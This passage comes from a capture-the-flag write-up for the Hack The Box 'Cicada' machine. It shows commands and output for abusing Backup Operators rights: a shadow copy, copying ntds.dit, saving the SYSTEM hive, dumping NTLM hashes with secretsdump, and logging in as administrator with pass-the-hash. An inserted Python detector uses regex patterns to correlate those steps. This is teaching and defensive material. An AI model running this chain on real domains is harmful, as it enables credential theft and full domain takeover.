                - Creation time: 6/5/2025 4:31:12 PM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: CICADA-DC.cicada.htb
                - Service machine: CICADA-DC.cicada.htb
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %temp% z:
-> %temp% = {2092a9c7-6030-4242-ae48-eb9fcebe32e2}
The shadow copy was successfully exposed as z:\.
->

Next, I used robocopy in backup mode (/B) to copy ntds.dit out of the shadow copy exposed as z:

*Evil-WinRM* PS C:\windows\temp> robocopy /B z:\Windows\NTDS .\ntds ntds.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Thursday, June 5, 2025 4:32:20 PM
   Source : z:\Windows\NTDS\
     Dest : C:\windows\temp\ntds\

    Files : ntds.dit

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

          New Dir          1    z:\Windows\NTDS\
            New File              16.0 m        ntds.dit

<...snip...>

------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         1         0         0         0         0
   Files :         1         1         0         0         0         0
   Bytes :   16.00 m   16.00 m         0         0         0         0
   Times :   0:00:00   0:00:00                       0:00:00   0:00:00


   Speed :           82,646,384 Bytes/sec.
   Speed :            4,729.064 MegaBytes/min.
   Ended : Thursday, June 5, 2025 4:32:20 PM

Membership in the Backup Operators group also allows saving registry hives with the reg command, so I used it to export the SYSTEM hive, which holds the boot key needed to decrypt the hashes in ntds.dit:

*Evil-WinRM* PS C:\windows\temp> reg save HKLM\SYSTEM SYSTEM
The operation completed successfully.

Then, I downloaded ntds.dit and SYSTEM:

*Evil-WinRM* PS C:\windows\temp> download ntds/ntds.dit
                                        
Info: Downloading C:\windows\temp\ntds/ntds.dit to ntds.dit
                                        
Info: Download successful!
*Evil-WinRM* PS C:\windows\temp> download SYSTEM
                                        
Info: Downloading C:\windows\temp\SYSTEM to SYSTEM
                                        
Info: Download successful!
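Each of the commands above (a scripted diskshadow run, a copy that names ntds.dit, and reg save of the SYSTEM hive) is something a legitimate backup operator might occasionally do, but all three from one account within a few minutes, with wsmprovhost.exe as the parent process, is the chain in this writeup. The correlation below is an added example (not part of the writeup) over constructed process-creation events using Sysmon Event ID 1 field names.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Stages of the technique, matched against the process command line.
STAGES = {
    "shadow_copy": re.compile(r"\bdiskshadow(\.exe)?\b.*\s/s\b", re.I),
    "ntds_copy":   re.compile(r"\bntds\.dit\b", re.I),
    "hive_save":   re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(system|sam|security)\b", re.I),
}
SEVERITY = {1: "low", 2: "medium", 3: "high"}

# Constructed process-creation events using Sysmon Event ID 1 field names.
EVENTS = [
    {"UtcTime": "2025-06-05 20:31:11", "User": "CICADA\\emily.oscars",
     "ParentImage": "C:\\Windows\\System32\\wsmprovhost.exe",
     "CommandLine": "diskshadow.exe /s c:\\windows\\temp\\diskshadow.txt"},
    {"UtcTime": "2025-06-05 20:32:20", "User": "CICADA\\emily.oscars",
     "ParentImage": "C:\\Windows\\System32\\wsmprovhost.exe",
     "CommandLine": "robocopy /B z:\\Windows\\NTDS .\\ntds ntds.dit"},
    {"UtcTime": "2025-06-05 20:33:05", "User": "CICADA\\emily.oscars",
     "ParentImage": "C:\\Windows\\System32\\wsmprovhost.exe",
     "CommandLine": "reg save HKLM\\SYSTEM SYSTEM"},
    # Benign noise: a scheduled system-state backup and an ordinary registry query.
    {"UtcTime": "2025-06-05 02:00:00", "User": "NT AUTHORITY\\SYSTEM",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "wbadmin start systemstatebackup -backupTarget:D: -quiet"},
    {"UtcTime": "2025-06-05 09:14:30", "User": "CICADA\\david.orelious",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "reg query HKLM\\SOFTWARE\\Cicada"},
]


def classify(event):
    """Name the stage an event belongs to, or None if it matches no stage."""
    for stage, pattern in STAGES.items():
        if pattern.search(event.get("CommandLine", "")):
            return stage
    return None


def correlate(events, window=timedelta(minutes=30)):
    """Return {user: alert} for users whose staged events fall inside `window`.
    Any single stage is a weak signal; two or more within minutes, from the
    same account, is the chain described in the writeup."""
    staged = defaultdict(list)
    for ev in events:
        stage = classify(ev)
        if stage:
            ts = datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S")
            staged[ev["User"]].append((ts, stage, ev["ParentImage"]))
    alerts = {}
    for user, recs in staged.items():
        recs.sort()
        best, lo = None, 0
        for hi in range(len(recs)):
            while recs[hi][0] - recs[lo][0] > window:   # slide the window forward
                lo += 1
            stages = {s for _, s, _ in recs[lo:hi + 1]}
            if best is None or len(stages) > len(best[0]):
                best = (stages, lo, hi)
        stages, lo, hi = best
        if len(stages) < 2:
            continue
        parents = {p.rsplit("\\", 1)[-1].lower() for _, _, p in recs[lo:hi + 1]}
        alerts[user] = {
            "stages": stages,
            "severity": SEVERITY[len(stages)],
            "first": recs[lo][0], "last": recs[hi][0],
            # wsmprovhost.exe as the parent means the commands arrived over WinRM.
            "remote_session": "wsmprovhost.exe" in parents,
        }
    return alerts


if __name__ == "__main__":
    for user, a in correlate(EVENTS).items():
        print(f"{a['severity'].upper()} {user}: {sorted(a['stages'])} "
              f"between {a['first']} and {a['last']} (WinRM: {a['remote_session']})")
```

The same events can be enriched with group membership: a hit from an account that is in Backup Operators but is not an approved backup service account is the case worth paging on, and reviewing who holds that membership is the preventive fix.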

Using impacket-secretsdump with ntds.dit and SYSTEM, I was able to extract user NTLM hashes:

┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: f954f575c626d6afe06c2b80cc2185e6
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
<...snip...>

With the hash of the administrator, I obtained a shell over WinRM:

┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ evil-winrm -i 10.10.11.35 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341
                                        
Evil-WinRM shell v3.5
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> ls

    Directory: C:\Users\Administrator\desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          6/5/2025   4:22 PM             34 root.txt


Written by Mike Garrity
